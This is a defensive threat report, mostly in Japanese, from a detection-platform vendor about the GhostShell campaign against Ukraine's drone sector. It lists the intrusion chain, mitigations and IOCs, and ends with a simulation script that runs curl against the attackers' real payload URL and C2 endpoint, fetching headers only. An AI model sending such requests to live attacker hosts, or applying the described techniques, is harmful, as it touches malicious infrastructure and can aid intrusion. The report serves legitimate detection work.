GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain

SOC Prime Team

フォローする

GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain

Detection stack

AIDR
Alert
ETL
Query

脅威レポート
攻撃フロー
検出
シミュレーション

概要

GhostShellとして知られる新たに追跡された脅威クラスターが、ウクライナのUAVおよび広範なドローンエコシステムを標的にしています。この作戦では、高度なマルウェアを使用し、mTLS認証を受けたインプラントやメモリ常駐型ローダーを含みます。初期アクセスを得るために、攻撃者はウクライナのドローン会社を偽装したおとり文書に依存しています。

調査

アナリストは、VBSスクリプトを中心としたマルチステージの侵入チェーンを発見しました。mTLS対応インプラントとしては 122.exe、およびTelegramベースのローダーである update.exeを含みます。リバースエンジニアリングによりカスタムXOR解読ロジック、埋め込まれたプライベートPKI、および覆面トンネリング用のXray Coreの使用が明らかにされました。また、同じインフラストラクチャ内でVidarインフォスティーラー活動も確認されました。

緩和策

組織は厳格なmTLS証明書の検証を実施し、クライアント証明書の不正使用を監視すべきです。メモリ内ロードを検出するためにエンドポイントの可視性を向上させる必要があります。 ntdll.dll のフック解除、およびWindowsのRunキー永続性に対する不審な変更も検出すべきです。既知の指揮統制ドメインやTelegramを介した設定取得への異常なアウトバウンドトラフィックにも注意を払う必要があります。

対応

影響を受けたシステムは直ちに隔離され、メモリフォレンジクスを通じてメモリ内インプラントを特定する必要があります。次に cloudaxis.cc and cdnexpress.ccに関与するトラフィックを含むネットワークログ確認が必要です。セキュリティチームは、リファレンスされたSHA-256ハッシュと特定のmTLSクライアント証明書 CN=ed6e62814295701f.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Initial Access and Execution Phase action_phishing["Action – T1566.001 Phishing: Spearphishing Attachment Description: Social engineering using decoy PDF documents impersonating Besomar to target UAV ecosystem."] class action_phishing action action_exploit["Action – T1203 Exploitation for Client Execution Description: Exploiting CVE-2025-8088 and CVE-2025-6218 via malicious archive Besomar_documentation.rar."] class action_exploit action process_vbs["Process – T1059.005 Command and Scripting Interpreter: Visual Basic Description: VBS file dropped into Windows Startup folder executing Base64-encoded strings via ExecuteGlobal."] class process_vbs process %% Persistence and Payload Download action_persistence_startup["Action – T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Description: VBS file placed in Startup folder for persistence."] class action_persistence_startup action network_download["Network – T1105 Ingress Tool Transfer Description: Downloading secondary payloads from cloudaxis.cc."] class network_download network op_branch(("AND")) class op_branch operator %% Path 1: 122.exe malware_122["Name: 122.exe Description: Loader that decrypts an embedded PE using XOR and executes it in memory."] class malware_122 malware action_fingerprint["Action: Host Fingerprinting Description: Collecting computer name, username, and PID."] class action_fingerprint action network_c2_122["C2 Communication: cdnexpress.cc Description: Uses unique mTLS client certificate for authentication."] class network_c2_122 network action_screen_cap["Action: Screen Capture Description: Capturing screens via GDI+."] class action_screen_cap action action_persistence_reg["Action: Registry Run Keys Description: Establishing persistence via Windows Registry Run keys."] class action_persistence_reg action %% Path 2: update.exe malware_update["Name: update.exe Description: In-memory loader retrieving C2 config from Telegram."] class malware_update malware action_anti_analysis["Action: T1562.001 Impair Defenses: Disable or Modify Tools Description: Unhooking EDR/monitoring tools by patching ntdll.dll."] class action_anti_analysis action action_metasploit_stager["Action: T1059.003 Command and Scripting Interpreter: Windows Command Shell Description: Executes a Metasploit-style HTTPS stager in memory."] class action_metasploit_stager action %% Path 3: 22.exe and Vidar malware_22["Name: 22.exe Description: Multi-stage launcher utilizing Xray Core client."] class malware_22 malware network_vless["Network: T1573 Encrypted Channel Description: Tunneling traffic via a VLESS connection."] class network_vless network malware_vidar["Name: Vidar Malware Description: Credential and data theft tool targeting browser passwords, cookies, wallets, and messaging artifacts."] class malware_vidar malware %% Connection Logic action_phishing –>|leads_to| action_exploit action_exploit –>|results_in| process_vbs process_vbs –>|uses| action_persistence_startup action_persistence_startup –>|triggers| network_download network_download –>|delivers| op_branch %% Branching to payloads op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% 122.exe flow malware_122 –>|performs| action_fingerprint malware_122 –>|communicates_with| network_c2_122 malware_122 –>|capable_of| action_screen_cap malware_122 –>|ensures| action_persistence_reg %% update.exe flow malware_update –>|retrieves_config_from| action_anti_analysis action_anti_analysis –>|executes| action_metasploit_stager %% 22.exe flow malware_22 –>|tunnels_via| network_vless network_vless –>|deploys| malware_vidar "

攻撃フロー

攻撃手法＆コマンド: 敵対者が初期の足掛かりを得て、専門的なペイロードをダウンロードして( 122.exe )、標的に対する制御を確立しようとしています。低いプロファイルを維持するために、マルウェアはハイジャックされたまたは見た目には正当なCDNドメイン( cloudaxis.cc )を利用しています。ダウンロード後、マルウェアは特定の分析エンドポイント( cdnexpress.cc/analytics )を介してC2インフラにテレメトリーを送り戻すか、「ハートビート」を試みます。シミュレーションではこれらの特定のGETリクエストを真似てURIベースの検出ロジックをトリガーするために curl を使用します。

回帰テストスクリプト:

# GhostShellペイロードダウンロードのシミュレーション
Write-Host "[+] GhostShellペイロードダウンロードをシミュレート中..."
curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe"

# GhostShell C2通信のシミュレーション (Analytics)
Write-Host "[+] GhostShell C2通信をシミュレート中..."
curl.exe -I "https://cdnexpress.cc/analytics"

クリーンアップコマンド:

# このシミュレーションでは実際にファイルはダウンロードされません(-Iでヘッダのみ使用)
# システムへの持続的変更は行われません。
Write-Host "[+] シミュレーション完了。クリーンアップは必要ありません。"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加